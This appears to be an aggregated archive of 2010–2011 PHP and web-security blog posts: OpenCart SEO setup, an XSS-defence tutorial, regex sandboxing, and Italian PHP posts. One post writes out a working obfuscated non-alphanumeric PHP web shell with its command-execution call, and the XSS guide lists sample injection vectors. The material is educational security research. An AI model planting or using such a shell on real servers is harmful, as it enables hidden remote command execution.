Adding SEO Friendly URL’s to OpenCart
november 2011 by hanicker
First off, I must give credit where it is due. I got most of my information on OpenCart Clean URL’s from PHP Genious. In this post I will explain how friendly or clean URL’s work in OpenCart.
Clean URL’s are built into OpenCart 1.5. To use SEO URL’s you need to enable them under your stores server settings, rename the .htaccess.txt file and add your SEO keyword for each product and category you create. The keywords will not be created for you. You must also have Apache mod_rewrite turned on. Most web hosts will have this on by default.
Enable SEO URL’s in the OpenCart Admin
The first step is to enable SEO URL’s in your stores admin. Go to the “System” drop-down and click on “Settings”. Locate the store you want to alter and click the “Edit” link off to the right. Finally click the “Server” tab and set the SEO URL’s radio to “Yes” and save your settings.
Rename the .htaccess.txt file
Next you must create an .htaccess file. If you do not create this file your pages will not display. OpenCart provides a file called .htaccess.txt. Rename this file to .htaccess and you will be good to go. If you don’t have this file in your root directory you will need to make your own .htaccess file. The fiel should include the following:
# 1.To use URL Alias you need to be running apache with mod_rewrite enabled.
# 2. In your opencart directory rename htaccess.txt to .htaccess.
# For any support issues please visit: http://www.opencart.com
Options +FollowSymlinks
# Prevent Directoy listing
Options -Indexes
# Prevent Direct Access to files
Order deny,allow
Deny from all
# SEO URL Settings
RewriteEngine On
# If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/
RewriteBase /
RewriteRule sitemap.xml /index.php?route=feed/google_sitemap
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]
### Additional Settings that may need to be enabled for some servers
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.
# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
# php_flag register_globals off
# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off
# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M
# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M
# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200
# 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200
Enter SEO Keywords for URL’s
Finally, you need to enter SEO keywords for every page, information, product and category you want to have URL rewrite. You can find the field for the SEO Keywords under the Data tab when editing and creating items.
Once you have entered the SEO Keywords your URL’w will be working. Now go and enjoy more traffic and happy customers.
Articles
Marketing
Programming
clean_url
ecommerce
OpenCart
php
seo
uri
url
from google
Clean URL’s are built into OpenCart 1.5. To use SEO URL’s you need to enable them under your stores server settings, rename the .htaccess.txt file and add your SEO keyword for each product and category you create. The keywords will not be created for you. You must also have Apache mod_rewrite turned on. Most web hosts will have this on by default.
Enable SEO URL’s in the OpenCart Admin
The first step is to enable SEO URL’s in your stores admin. Go to the “System” drop-down and click on “Settings”. Locate the store you want to alter and click the “Edit” link off to the right. Finally click the “Server” tab and set the SEO URL’s radio to “Yes” and save your settings.
Rename the .htaccess.txt file
Next you must create an .htaccess file. If you do not create this file your pages will not display. OpenCart provides a file called .htaccess.txt. Rename this file to .htaccess and you will be good to go. If you don’t have this file in your root directory you will need to make your own .htaccess file. The fiel should include the following:
# 1.To use URL Alias you need to be running apache with mod_rewrite enabled.
# 2. In your opencart directory rename htaccess.txt to .htaccess.
# For any support issues please visit: http://www.opencart.com
Options +FollowSymlinks
# Prevent Directoy listing
Options -Indexes
# Prevent Direct Access to files
Order deny,allow
Deny from all
# SEO URL Settings
RewriteEngine On
# If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/
RewriteBase /
RewriteRule sitemap.xml /index.php?route=feed/google_sitemap
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]
### Additional Settings that may need to be enabled for some servers
### Uncomment the commands by removing the # sign in front of it.
### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.
# 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
# php_flag register_globals off
# 2. If your cart has magic quotes enabled, This may work to disable it:
# php_flag magic_quotes_gpc Off
# 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
# php_value upload_max_filesize 999M
# 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value post_max_size 999M
# 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_execution_time 200
# 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
# php_value max_input_time 200
Enter SEO Keywords for URL’s
Finally, you need to enter SEO keywords for every page, information, product and category you want to have URL rewrite. You can find the field for the SEO Keywords under the Data tab when editing and creating items.
Once you have entered the SEO Keywords your URL’w will be working. Now go and enjoy more traffic and happy customers.
november 2011 by hanicker
Non alphanumeric code in PHP
september 2011 by hanicker
So a small php shell was tweeted around and it inspired me to investigate a way to execute non-alphanumeric code. First off I started with the idea of using octal escapes in PHP and constructing the escape so for example: \107 is “G” if I could construct the “107″ and add the backslash to the beginning maybe I could construct “G”. It worked like this:
$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";
But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.
Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell.
Onto the second technique, PHP allows you to use bitwise operators on strings
'a'|'b';//c!
We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell
<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|" ").($_[+""]|" ").($_[+""]^" ");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
The first part converts a string into an array by attempting to assign to “0″ position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0×6, “A”|0×5 and “A^0×15″. There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.
To call the shell you’d use:
?_=shell_exec&__=whoami
Don’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.
php
Security
from google
$_=+"";
$_=(++$_)+(++$_)+(++$_)+(++$_);
$__=+"";
$__++;
$___=$_*$_+$__+$__+$__+$__+$__+$__+$__;//107
$___="\\$___";
But there was no way to evaluate the escape once it was constructed without using alphanum chars. So I was stumped.
Then I had a brain wave, php automatically does a string conversion for arrays and converts them to “Array” when accessed as a string. I had “A”, “r”, “r” etc but I really needed “GET” in order to create a nice small non-alpha shell.
Onto the second technique, PHP allows you to use bitwise operators on strings
'a'|'b';//c!
We can make new characters by combining others, but I only had a limited set to work with. A simple for loop later I combined the characters to create “GET” and thus make our non-alphanum small PHP shell
<?
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|" ").($_[+""]|" ").($_[+""]^" ");
?>
<?=${'_'.$_}['_'](${'_'.$_}['__']);?>
The first part converts a string into an array by attempting to assign to “0″ position of the string. Then I make sure the array is a string. Then I use “A” from array with bitwise operators to construct “G”, “E” and “T” using the characters “A”|0×6, “A”|0×5 and “A^0×15″. There you have it,you could even generate non-alpha code without using GET quite easily by producing different characters until you get an eval method.
To call the shell you’d use:
?_=shell_exec&__=whoami
Don’t forget in order to analyze php code use RIPS if you ever encounter this in the wild.
september 2011 by hanicker
Protecting against XSS
september 2011 by hanicker
The problem as I see it
Where to start? Let me start by telling you that most of the books you read are wrong. The code samples you copy of the internet to do a specific task are wrong (the wrong way to handle a GET request), the function you copied from that work colleague who in turn copied from a forum is wrong (the wrong way to handle redirects). Start to question everything. Maybe this blog post is wrong this is the kind of mindset you require in order to protect your sites from XSS. You as a developer need to start thinking more about your code. If a article you are reading contains stuff like echo $_GET or Response.Write without filtering then it’s time to close that article.
Are frameworks the answer? I think in my honest opinion no. Yes a framework might prevent XSS in the short term but in the long term the framework code will be proven to contain mistakes as it evolves and thus when it is exploited it will be more severe than if you wrote the code yourself. Why more severe? A framework hole can be easily automated since many sites share the same codebase, if you wrote your own filtering code than an attacker would be able to exploit the individual site but find it hard to automate a range of sites using different filtering methods. This is one of the main reasons the internet works today, not because everything is secure just because everything is different.
One of the arguments I hear is that a developer can’t be trusted to create a perfect filtering system for a site and using a framework ensures the developer follows best guidelines. I disagree, developers are intelligent they write code and understand code, if you can build a system you can protect it because you’re in the best position to.
How to handle input
When you handle user input just think to yourself “a number is a vector”, imagine a site that renders a image server side and allows you to choose the width and height of the graphic, if you don’t think a number is a vector then you might not put any restrictions on the width and height of the generated graphic but what happens when an attacker requests a 100000×100000 graphic? If you’re code doesn’t handle the maximum and minimum inputs then an attacker can DOS your server with multiple requests. The lesson is not to be lazy about each input you handle, you need to make sure each value is validated correctly.
The process should be as follows.
1. Validate type – Ensure the value your are getting is what you were expecting.
2. Whitelist – Remove any characters that should not be in the value by providing the only characters that should.
3. Validate Length – Always validate the length of the input even when the value isn’t being placed in the database. The less that an attacker has to work with the better.
4. Restrict – Refine what’s allowed within the range of characters you allow. For example is the minimum value 5?
5. Escape – Depending on context (where your variable is on the page) escape correctly.
You can make things easier for yourself by placing these methods into a function or a class but don’t overcomplicate keep each method as simple as possible and be very careful and descriptive with your function names to avoid confusion.
HTML context
Lets look at an example of the method above with a code sample in PHP.
<?php
$x = (string) $_GET['x']; //ensure we get a string not array
$x = preg_replace("/[^\w]/","", $x); //remove any characters that are not a-z, A-Z, 0-9 or _
$x = substr($x, 0, 10);//restrict to a maximum of 10 characters
if(!preg_match("/^a/i", $x)) {//this value must only begin with a or A
$x = '';
}
echo '<b>' . htmlentities($x, ENT_QUOTES) . '</b>'; //escape everything according to context of $x
?>
You might be wondering why I used (string) in the code above. Lets try it without it.
Using the following:test.php?x[]=123
Results in: “Warning: substr() expects parameter 1 to be string, array given”
Because of the PHP feature which allows you to pass arrays over a GET request you can create a warning in PHP over unexpected type when trying to whitelist the value. Using type hinting ensures you get the expected type.
Great so we now understand how to restrict and escape a value. Lets look at another context.
Script context
When not in XHTML/XML mode a script tag does not decode HTML entities. If you have a value within a variable inside a script tag, question is what do you escape?
example:
<script>x='value here';</script>
Inside a JavaScript variable like this you have to watch out for the following ‘ and </script> using these vectors it’s possible to XSS the value. The two examples are listed below.
vector 1: ',alert(1),//
vector 2: </script><img src=1 onerror=alert(1)>
The second example requires no quotes and a lot of developers assume it won’t be executed because it’s still inside a JavaScript variable, this is clearly wrong as it executes because the browser doesn’t know where the script begins and ends correctly.
To escape a value inside a script context you should JavaScript escape the value. The best way of doing this is using unicode escapes, a unicode escape in JavaScript looks like the following:
<script>
alert('\u0061');//"a" in a unicode escape
</script>
You can experiment with unicode escapes using my Hackvertor tool. Please understand how they work as they will be very important to you when understanding how to protect many contexts.
It’s very important you follow the same procedure as before (Validate type, Whitelist, Validate Length, Restrict, Escape) for the specific variable you’re working on but this time we will convert our value into unicode escapes. A simple function to do that is as follows:
<?php
function jsEscape($input) {
if(strlen($input) == 0) {
return '';
}
$output = '';
$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);//remove any characters outside the range 0x01-0x7f
$chars = str_split($input);
for($i=0;$i<count($chars);$i++) {
$char = $chars[$i];
$output .= sprintf("\\u%04x", ord($char));//get the character code and convert to hex and prefix with \u00
}
return $output;
}
?>
I’ve purposely designed this function with a few little optimisations missing, for example instead of using unicode you could use hex escapes since we restrict the range of allowed characters, alphanumeric characters are even converted when they could be replaced by their literal characters and new lines/tabs are encoded too when you could use the shorter equivalent. Lets add a line to use a literal tab character instead of \u0009. Why would you want to do this? To reduce the characters sent down the wire.
Code to handle tab:
<?php
if(preg_match("/^\t$/", $char)) {
$output .= '\\t';
continue;
}
?>
This converts a tab specifically to “\t”, notice how we separate input and output and by using continue we can skip the input character and override it with something more specific. The full code is now below for clarity.
<?php
function jsEscape($input) {
if(strlen($input) == 0) {
return '';
}
$output = '';
$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);
$chars = str_split($input);
for($i=0;$i<count($chars);$i++) {
$char = $chars[$i];
if(preg_match("/^\t$/", $char)) {
$output .= '\\t';//don't unicode escape but using a shorter \t instead. Double escape remember!
continue;//skip a line and move on the the next char
}
$output .= sprintf("\\u%04x", ord($char));
}
return $output;
}
?>
Exercises for this code:
1. Can you handle characters outside the ascii range?
2. Convert any non dangerous character to their escaped or literal representation.
Script context in XHTML
In the previous section you might have wondered about XHTML when I stated “when not in XHTML/XML mode a script tag does not decode HTML entities”. In XHTML entities can be decoded even inside script blocks! Fortunately the code I provided for that section will handle that since unicode escapes are used. If you followed the exercises in that section did you make the “&” safe? That is something to think about when you are working on XHTML page. In order for XHTML to be used in the browser you have to serve the pages with the correct XHTML header. I recommend you don’t use the XHTML header.
Even though the previous examples still protect you against attack, I will show you a couple of vectors for XHTML sites/
<script>x='',alert(/This works in XHTML/)//';</script>
<script>x='',alert(/This also works in XHTML/)//';</script>
This would work in any XML based format, entities can be used to break out of strings and just a simple </ will also do the trick. Don’t use XHTML or if you do unicode escape and don’t allow literal “&”.
JavaScript events
Now you know what happens in XHTML, you might be interested to know it also happens in HTML attributes. Any HTML attribute including events such as onclick will automatically decode entities and use them as if they were literal characters. Best demonstrated with a code example.
<div title=">" id="x">test</div>
<script>
alert(document.getElementById('x').title);
</script>
As you can see instead of the value of the title attribute of the div element returning “>” it returned “>” because it was automatically decoded. This whole process is one of the root causes of XSS, the developer didn’t understand that. Lets look at what happens with a onclick event and a variable of “x”.
<a href="#" onclick="x='',alert(1),'';">test</a>
Clicking on the link fired the alert because like XHTML the entities are decoded, when you are in the attribute context you need to do exactly the same as if you were in the XHTML context. Reusing your jsecape function will fully protect you from XSS in attributes and variables like this.
innerHTML context
I hope you’ve grasped the previous concepts because now it’s going to get slightly confusing. If you[…]
articles
php
Security
xss
from google
Where to start? Let me start by telling you that most of the books you read are wrong. The code samples you copy of the internet to do a specific task are wrong (the wrong way to handle a GET request), the function you copied from that work colleague who in turn copied from a forum is wrong (the wrong way to handle redirects). Start to question everything. Maybe this blog post is wrong this is the kind of mindset you require in order to protect your sites from XSS. You as a developer need to start thinking more about your code. If a article you are reading contains stuff like echo $_GET or Response.Write without filtering then it’s time to close that article.
Are frameworks the answer? I think in my honest opinion no. Yes a framework might prevent XSS in the short term but in the long term the framework code will be proven to contain mistakes as it evolves and thus when it is exploited it will be more severe than if you wrote the code yourself. Why more severe? A framework hole can be easily automated since many sites share the same codebase, if you wrote your own filtering code than an attacker would be able to exploit the individual site but find it hard to automate a range of sites using different filtering methods. This is one of the main reasons the internet works today, not because everything is secure just because everything is different.
One of the arguments I hear is that a developer can’t be trusted to create a perfect filtering system for a site and using a framework ensures the developer follows best guidelines. I disagree, developers are intelligent they write code and understand code, if you can build a system you can protect it because you’re in the best position to.
How to handle input
When you handle user input just think to yourself “a number is a vector”, imagine a site that renders a image server side and allows you to choose the width and height of the graphic, if you don’t think a number is a vector then you might not put any restrictions on the width and height of the generated graphic but what happens when an attacker requests a 100000×100000 graphic? If you’re code doesn’t handle the maximum and minimum inputs then an attacker can DOS your server with multiple requests. The lesson is not to be lazy about each input you handle, you need to make sure each value is validated correctly.
The process should be as follows.
1. Validate type – Ensure the value your are getting is what you were expecting.
2. Whitelist – Remove any characters that should not be in the value by providing the only characters that should.
3. Validate Length – Always validate the length of the input even when the value isn’t being placed in the database. The less that an attacker has to work with the better.
4. Restrict – Refine what’s allowed within the range of characters you allow. For example is the minimum value 5?
5. Escape – Depending on context (where your variable is on the page) escape correctly.
You can make things easier for yourself by placing these methods into a function or a class but don’t overcomplicate keep each method as simple as possible and be very careful and descriptive with your function names to avoid confusion.
HTML context
Lets look at an example of the method above with a code sample in PHP.
<?php
$x = (string) $_GET['x']; //ensure we get a string not array
$x = preg_replace("/[^\w]/","", $x); //remove any characters that are not a-z, A-Z, 0-9 or _
$x = substr($x, 0, 10);//restrict to a maximum of 10 characters
if(!preg_match("/^a/i", $x)) {//this value must only begin with a or A
$x = '';
}
echo '<b>' . htmlentities($x, ENT_QUOTES) . '</b>'; //escape everything according to context of $x
?>
You might be wondering why I used (string) in the code above. Lets try it without it.
Using the following:test.php?x[]=123
Results in: “Warning: substr() expects parameter 1 to be string, array given”
Because of the PHP feature which allows you to pass arrays over a GET request you can create a warning in PHP over unexpected type when trying to whitelist the value. Using type hinting ensures you get the expected type.
Great so we now understand how to restrict and escape a value. Lets look at another context.
Script context
When not in XHTML/XML mode a script tag does not decode HTML entities. If you have a value within a variable inside a script tag, question is what do you escape?
example:
<script>x='value here';</script>
Inside a JavaScript variable like this you have to watch out for the following ‘ and </script> using these vectors it’s possible to XSS the value. The two examples are listed below.
vector 1: ',alert(1),//
vector 2: </script><img src=1 onerror=alert(1)>
The second example requires no quotes and a lot of developers assume it won’t be executed because it’s still inside a JavaScript variable, this is clearly wrong as it executes because the browser doesn’t know where the script begins and ends correctly.
To escape a value inside a script context you should JavaScript escape the value. The best way of doing this is using unicode escapes, a unicode escape in JavaScript looks like the following:
<script>
alert('\u0061');//"a" in a unicode escape
</script>
You can experiment with unicode escapes using my Hackvertor tool. Please understand how they work as they will be very important to you when understanding how to protect many contexts.
It’s very important you follow the same procedure as before (Validate type, Whitelist, Validate Length, Restrict, Escape) for the specific variable you’re working on but this time we will convert our value into unicode escapes. A simple function to do that is as follows:
<?php
function jsEscape($input) {
if(strlen($input) == 0) {
return '';
}
$output = '';
$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);//remove any characters outside the range 0x01-0x7f
$chars = str_split($input);
for($i=0;$i<count($chars);$i++) {
$char = $chars[$i];
$output .= sprintf("\\u%04x", ord($char));//get the character code and convert to hex and prefix with \u00
}
return $output;
}
?>
I’ve purposely designed this function with a few little optimisations missing, for example instead of using unicode you could use hex escapes since we restrict the range of allowed characters, alphanumeric characters are even converted when they could be replaced by their literal characters and new lines/tabs are encoded too when you could use the shorter equivalent. Lets add a line to use a literal tab character instead of \u0009. Why would you want to do this? To reduce the characters sent down the wire.
Code to handle tab:
<?php
if(preg_match("/^\t$/", $char)) {
$output .= '\\t';
continue;
}
?>
This converts a tab specifically to “\t”, notice how we separate input and output and by using continue we can skip the input character and override it with something more specific. The full code is now below for clarity.
<?php
function jsEscape($input) {
if(strlen($input) == 0) {
return '';
}
$output = '';
$input = preg_replace("/[^\\x01-\\x7F]/", "", $input);
$chars = str_split($input);
for($i=0;$i<count($chars);$i++) {
$char = $chars[$i];
if(preg_match("/^\t$/", $char)) {
$output .= '\\t';//don't unicode escape but using a shorter \t instead. Double escape remember!
continue;//skip a line and move on the the next char
}
$output .= sprintf("\\u%04x", ord($char));
}
return $output;
}
?>
Exercises for this code:
1. Can you handle characters outside the ascii range?
2. Convert any non dangerous character to their escaped or literal representation.
Script context in XHTML
In the previous section you might have wondered about XHTML when I stated “when not in XHTML/XML mode a script tag does not decode HTML entities”. In XHTML entities can be decoded even inside script blocks! Fortunately the code I provided for that section will handle that since unicode escapes are used. If you followed the exercises in that section did you make the “&” safe? That is something to think about when you are working on XHTML page. In order for XHTML to be used in the browser you have to serve the pages with the correct XHTML header. I recommend you don’t use the XHTML header.
Even though the previous examples still protect you against attack, I will show you a couple of vectors for XHTML sites/
<script>x='',alert(/This works in XHTML/)//';</script>
<script>x='',alert(/This also works in XHTML/)//';</script>
This would work in any XML based format, entities can be used to break out of strings and just a simple </ will also do the trick. Don’t use XHTML or if you do unicode escape and don’t allow literal “&”.
JavaScript events
Now you know what happens in XHTML, you might be interested to know it also happens in HTML attributes. Any HTML attribute including events such as onclick will automatically decode entities and use them as if they were literal characters. Best demonstrated with a code example.
<div title=">" id="x">test</div>
<script>
alert(document.getElementById('x').title);
</script>
As you can see instead of the value of the title attribute of the div element returning “>” it returned “>” because it was automatically decoded. This whole process is one of the root causes of XSS, the developer didn’t understand that. Lets look at what happens with a onclick event and a variable of “x”.
<a href="#" onclick="x='',alert(1),'';">test</a>
Clicking on the link fired the alert because like XHTML the entities are decoded, when you are in the attribute context you need to do exactly the same as if you were in the XHTML context. Reusing your jsecape function will fully protect you from XSS in attributes and variables like this.
innerHTML context
I hope you’ve grasped the previous concepts because now it’s going to get slightly confusing. If you[…]
september 2011 by hanicker
Con PHP si lavora di più?
june 2011 by hanicker
Riprendo questo post di edit citandone un paragrafo:
Le conoscenze su PHP risultano essere stabilmente le più ricercate per la realizzazione dei progetti proposti dai committenti, al secondo posto troviamo il Graphic Design (il Web design è 6°), mentre, le competenze linguistiche per le traduzioni conquistano la medaglia di bronzo superando nell’ordine WordPress (blog engine comunque scritto in PHP) e l’intramontabile HTML.
Voi che ne pensate?
CC BY-NC-SA 2006 - 2011 · Con PHP si lavora di più?
PHP
from google
Le conoscenze su PHP risultano essere stabilmente le più ricercate per la realizzazione dei progetti proposti dai committenti, al secondo posto troviamo il Graphic Design (il Web design è 6°), mentre, le competenze linguistiche per le traduzioni conquistano la medaglia di bronzo superando nell’ordine WordPress (blog engine comunque scritto in PHP) e l’intramontabile HTML.
Voi che ne pensate?
CC BY-NC-SA 2006 - 2011 · Con PHP si lavora di più?
june 2011 by hanicker
Facebook HipHop e le performance
april 2011 by hanicker
PHP è un linguaggio interpretato e non compilato. La differenza? Non c'è bisogno che ve la spieghi, la conoscete benissimo, no?
A parte gli scherzi quelli di Facebook si sono inventati HipHop (e l'hanno rilasciato con licenza opensource). Cosa fa HipHop? Fa quello che non si dovrebbe fare di solito: prende un linguaggio interpretato come PHP, lo converte in C++ (un linguaggio compilato) e appunto, lo compila.
Perché? Per questioni di performance... Semplifichiamo: un linguaggio compilato è decisamente più veloce di un linguaggio interpretato. C'è "un passaggio" di meno nell'esecuzione del codice (l'interprete) e quindi si risparmia del tempo. Quanto tempo? Secondo Facebook il miglioramento è di tutto rispetto: 1.7x.
Cosa vuol dire? Vuol dire che Facebook risparmia il 50% di CPU sui suoi server (percentuale aumentata nel corso del tempo, che può usare per fare altro) e che (teoricamente) senza spendere soldi in nuovo hardware ha migliorato le performance generali del suo sito di quasi il doppio.
Notevole, non trovate?
CC BY-NC-SA 2006 - 2011 · Facebook HipHop e le performance
PHP
facebook
hiphop
from google
A parte gli scherzi quelli di Facebook si sono inventati HipHop (e l'hanno rilasciato con licenza opensource). Cosa fa HipHop? Fa quello che non si dovrebbe fare di solito: prende un linguaggio interpretato come PHP, lo converte in C++ (un linguaggio compilato) e appunto, lo compila.
Perché? Per questioni di performance... Semplifichiamo: un linguaggio compilato è decisamente più veloce di un linguaggio interpretato. C'è "un passaggio" di meno nell'esecuzione del codice (l'interprete) e quindi si risparmia del tempo. Quanto tempo? Secondo Facebook il miglioramento è di tutto rispetto: 1.7x.
Cosa vuol dire? Vuol dire che Facebook risparmia il 50% di CPU sui suoi server (percentuale aumentata nel corso del tempo, che può usare per fare altro) e che (teoricamente) senza spendere soldi in nuovo hardware ha migliorato le performance generali del suo sito di quasi il doppio.
Notevole, non trovate?
CC BY-NC-SA 2006 - 2011 · Facebook HipHop e le performance
april 2011 by hanicker
Calendario Vettoriale 2011 PDF
december 2010 by hanicker
Riprendendo un vecchio post ecco il calendario vettoriale 2011 in formato PDF.
Lo trovate a questo link. Potete aprire il PDF del calendario 2011 in Illustrator o Photoshop e farne poi quel che volete.
Serve il calendario 2012? Basta cambiare il parametro alla fine del link.
P.s.
Per i più "temerari" il sorgente è sempre qui.
Grafica
PHP
calendario_2011_pdf
calendario_pdf
calendario_vettoriale
from google
Lo trovate a questo link. Potete aprire il PDF del calendario 2011 in Illustrator o Photoshop e farne poi quel che volete.
Serve il calendario 2012? Basta cambiare il parametro alla fine del link.
P.s.
Per i più "temerari" il sorgente è sempre qui.
december 2010 by hanicker
Regular expression sandboxing
may 2010 by hanicker
Birth of the regex sandbox
I decided today to do a proper blog post to explain my reasons for creating regex sandboxes. I don’t often write a lot of words on this blog partly because I’m not very good a making long meaningful sentences and partly because I think the point can often be made in less words. Hopefully this will be useful for someone writing filters.
First off a quote “You can’t parse [X]HTML with regex. Because HTML can’t be parsed by regex. Regex is not a tool that can be used to correctly parse HTML” from (stackoverflow). I agree with the comment it isn’t possible to fully parse HTML with regexes but my goal wasn’t to do that, I wanted to parse a safe form of HTML. I also have a uncontrollable urge to do something that people say can’t be done.
Now we have that out of the way, how did this all begin? Well I was building a char by char JavaScript parser inside JavaScript to allow untrusted code to be executed. Every time I wrote a simple string matching function I found myself making shortcuts and using regexes instead. For example why loop through all characters when you can whitelist the desired ones? I soon found that I had a great advantage of using regexes instead of parsing every character, because I could use the native JavaScript engine to help me.
This lead me to develop JSReg [1], at first it seemed very easy to match JavaScript, the numbers were pretty easy and strings but I then encountered one of the first problems of regex sandboxes. It is very difficult to match something that is matching itself, for example an array can contain pretty much any JavaScript statement and itself but if you are defining it how can you match it? I didn’t really have an answer to this, one of my solutions to this problem was to create a recursive regex that created a second compiler to match inside the first match and so on. But this was slow and because JavaScript doesn’t have lookbehind previous matches would eat characters in the next match (I’ll talk more about this in the design). My other idea was to use backreferences but these are very difficult to track when using multiple regexes and they only return a successful match in my tests it wasn’t possible to produce a perfect array match using backreferences. I could be wrong of course I know I’m not perfect.
The design
My basis of my design was to not rely on 3rd party code were possible that means no jquery etc, in addition I should employ multiple layers of security wherever possible. These were good design decisions. Throughout initial testing the multiple layers proved difficult to break down. For JSReg the first layer was an iframe, the iframe was created each time of execution enabling fresh prototypes and a throw away box once execution had finished. Then I whitelisted the entire JavaScript objects/properties, this was done by forcing all methods to use suffix/prefix of “$”. Each variable assignment was then localized using var to force local variables. Each object was also checked to ensure it didn’t contain a window reference.
Javascript arrays proved tricky as mentioned earlier because of the amount of code that can be included within them, initially I decided to try and match them and their contents. But there were several performance problems of matching all that code and JavaScript regex limitations. For example I use one regex with a replace function to globally match each sequence using groups, the idea is to match all the valid objects first. In the instance of an array you’d first match all regex objects, strings etc because they can contain a “[" and "]” then once all valid objects have been enumerated by the regex engine it will encounter the first “[" of our array.
This works well in practice for every object apart from arrays. In JavaScript the array literal shares the same syntax as the object accessor. Therefore you have to identify the difference between an array or object. Sounds easy?
[][0[0,0[0]]];
+[][0[0,0[0]]];
{}['I am an array']
~{a:0}['I am a object accessor']
As you can see with the samples above, you’d have to match the entire js syntax before the opening “[". Then if you don't match the entire sequence inside the array you won't know if the ending "]” is part of an array sequence or object. This problem was unsolved for a long time. The main reason was in order to protect against window references I rewrite object accessors like obj['abc'] to obj[JSREG_FUNC.gp('abc')] so the function returns a safe string which uses the prefix/suffix of $ e.g. abc becomes $abc$. Because a string is returned of the expression it would break an array if it wasn’t detected.
Detecting an array or object was difficult because of the design too, you see if a regex object is matched like /abc/ and is followed by a object accessor like /abc/['source'] the previous expression is eaten by the parser so the next match is effectively ['source'] which JSReg understandably thinks is an array. A simple way round this would be to lookbehind to see if a whitelist of characters make the opening “[" an array or not. But JavaScript doesn't support lookbehinds!
The simple workaround was to use Array(1,2,3) instead for arrays and assume all "[" and "]” were not arrays. This worked but it breaks existing code. Finally after many attempts I think I’ve come up with a solution. I store a list of previous matches and rewrite all array literals and object accessors into a function or method. This means I no longer need to detect the ending of the array as they both have a “)” instead of a “]”. Easily demonstrated with a code example:-
[1,2,3] //becomes:-
A(Number(1),Number(2),Number(3))
window['x']//becomes:-
$window$.JSREG_PROP('x')
Finally as part of the design I check the JavaScript syntax before and after conversion this provides another layer of security if the rewrite fails at any part of matching the code.
The code
JavaScript is difficult to match but I found HTML/CSS easier. At first I started the code for HTMLReg [2] and CSSReg [3] in a similar way to JSReg. Then I realized when hacking my own code how I could make it better to defend against attack. First off I employed a strict whitelist to remove any partial open HTML attacks and evil attributes that were obvious attacks. This means I didn’t stick to the HTML specification, I don’t allow any junk in attributes. For example if you want to include “<" or ">” inside a title attribute then you have to encode it. I may allow them in future if it can be proven safe but I’d rather not fight something I can’t win. You may disagree with what I’ve just said but your filter is probably being pwnd right now.
Once I had my whitelist of tags and attributes I constructed RegExes for any individual parts I wanted to match. For example text nodes, invalid tags and valid attributes, these would be nicely chained together in one big regex. Then each part is grouped so that you can match each expression and validate it.
Here is how it works:-
html.replace(mainRegExp, function($0, $styleTag, $tag, $text, $invalidTags) {}
Notice how I use the replace function, I don’t do html = html.replace because I only want to match the text in my regexes. I prefer to use replace because I have a nice reference to each group like this automatically with local variables. This was a lesson I learned from developing JSReg as if the replace fails it will return your plain code rather than rewrite it.
Inside the function I include a couple of things in each block I’ll use the text node as an example:-
if($text !== undefined && $text.length) {
output += $text;
parseTree+='text('+$text+')\n';
}
Here if the text node is matched it adds it to the output. Parse tree is a nice way of keeping track of what you’ve matched. It’s a useful debugging reference. The if statement is required because of browser inconsistencies when matching groups.
In the case of HTMLReg for performance reasons I have a whitelist to match a general tag, then inspect it further so I’m only matching a smaller amount of text. You can see that with the following code:-
if($tag !== undefined && $tag.length) {
if(!new RegExp('^<\\\/?'+allowedTags.source+'[\\s>]','i').test($tag)) {
return '';
}
parseTree+='tag('+$tag+')\n';
if(!/^<\/?[a-z0-9]+>$/i.test($tag)) {
$tag = parseAttrValues($tag);
}
output += $tag;
}
Once my tag has been matched I then start to parse attributes, I do this by creating a hidden div and reading it’s contents. This is cool for a number of reasons, we can read what the browser reads and our code automatically gets formatted. Because we then use the DOM it means our entities will be decoded for us. While testing I found that JavaScript won’t be executed using innerHTML without certain tags or attributes, if I whitelist the tags and attributes then I can use the innerHTML safely without having to worry about execution. I have a backup plan if this fails, I could be more strict with certain attributes if it’s possible to execute code.
